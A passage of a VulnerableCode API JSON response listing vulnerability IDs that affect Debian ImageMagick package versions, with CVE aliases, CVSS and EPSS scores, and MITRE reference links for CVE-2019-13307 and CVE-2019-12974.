{ "vulnerability": "VCID-tnb2-7mvf-sqdk" }, { "vulnerability": "VCID-tnnn-bg52-93a9" }, { "vulnerability": "VCID-trt9-1y65-53en" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-tv6b-u42h-xkh2" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-tzpa-13fk-7kc9" }, { "vulnerability": "VCID-u23c-4px5-c3g9" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-u9um-rar7-97e8" }, { "vulnerability": "VCID-u9v8-n717-fyag" }, { "vulnerability": "VCID-uatu-64df-b7b8" }, { "vulnerability": "VCID-uayc-3r68-tudp" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-umnw-ksa8-9ua8" }, { "vulnerability": "VCID-upce-8s7m-2kfk" }, { "vulnerability": "VCID-ur14-3rbn-j3ev" }, { "vulnerability": "VCID-urv8-ve9y-e3b4" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v24g-h7t5-nbec" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-v7m7-26bu-wfer" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vbgc-23c4-77hu" }, { "vulnerability": "VCID-vd3a-e897-8bfn" }, { "vulnerability": "VCID-vdum-127b-qfbq" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vp4y-qhc4-nuat" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-vzru-smr4-5kfk" }, { "vulnerability": "VCID-w44j-ecnr-mkhv" }, { "vulnerability": "VCID-w5bd-tn21-fqh7" }, { "vulnerability": "VCID-w8d2-r2ct-m7gv" }, { "vulnerability": "VCID-wbx1-wdxc-k3bc" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-wwxb-6psb-xybx" }, { "vulnerability": "VCID-x3wb-64kk-gues" }, { "vulnerability": "VCID-x65n-6vuk-4ufk" }, { "vulnerability": "VCID-x6sg-6k7v-9qd8" }, { "vulnerability": "VCID-x7us-26aq-3yf8" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xaef-x656-fqfq" }, { "vulnerability": "VCID-xgu5-jypk-h3bd" }, { "vulnerability": "VCID-xgzr-fhu9-myed" }, { "vulnerability": "VCID-xk7c-7f1m-sqe5" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xp3x-q8w4-myhb" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-xtq9-fvcv-kfat" }, { "vulnerability": "VCID-xy5b-m3h2-hbfj" }, { "vulnerability": "VCID-y2nm-f9vb-d7ez" }, { "vulnerability": "VCID-y2pd-cxmz-6yfp" }, { "vulnerability": "VCID-y3xr-bv9y-mqb5" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-ydbk-11w9-wyen" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yqzg-rzp1-bbgm" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-yxwd-j8uj-tudx" }, { "vulnerability": "VCID-z7e5-pt2s-x3a5" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zfw4-5zqw-huh7" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zjgp-g783-d3hy" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zrkc-cfnt-r7hr" }, { "vulnerability": "VCID-zrtt-8nnj-v3ch" }, { "vulnerability": "VCID-zs46-dubn-wfga" }, { "vulnerability": "VCID-zszf-nytw-jqgx" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" }, { "vulnerability": "VCID-zyg9-ad7g-ayex" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.7.4%252Bdfsg-11%252Bdeb9u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13307" ], "risk_score": 3.3, "exploitability": "0.5", "weighted_severity": "6.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6zuv-uh18-k3c1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82456?format=api", "vulnerability_id": "VCID-7gya-qyjx-qqfx", "summary": "imagemagick: null-pointer dereference in function ReadPANGOImage in coders/pango.c and ReadVIDImage in coders/vid.c causing denial of service", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12974.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12974.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00192", "scoring_system": "epss", "scoring_elements": "0.40965", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00192", "scoring_system": "epss", "scoring_elements": "0.41171", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00192", "scoring_system": "epss", "scoring_elements": "0.41138", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00192", "scoring_system": "epss", "scoring_elements": "0.41121", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00192", "scoring_system": "epss", "scoring_elements": "0.41164", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00192", "scoring_system": "epss", "scoring_elements": "0.41136", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00192", "scoring_system": "epss", "scoring_elements": "0.41062", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00196", "scoring_system": "epss", "scoring_elements": "0.41564", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00196", "scoring_system": "epss", "scoring_elements": "0.41548", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00196", "scoring_system": "epss", "scoring_elements": "0.41536", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00196", "scoring_system": "epss", "scoring_elements": "0.41446", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00196", "scoring_system": "epss", "scoring_elements": "0.4149", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00196", "scoring_system": "epss", "scoring_elements": "0.4154", "published_at": "2026-04-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", 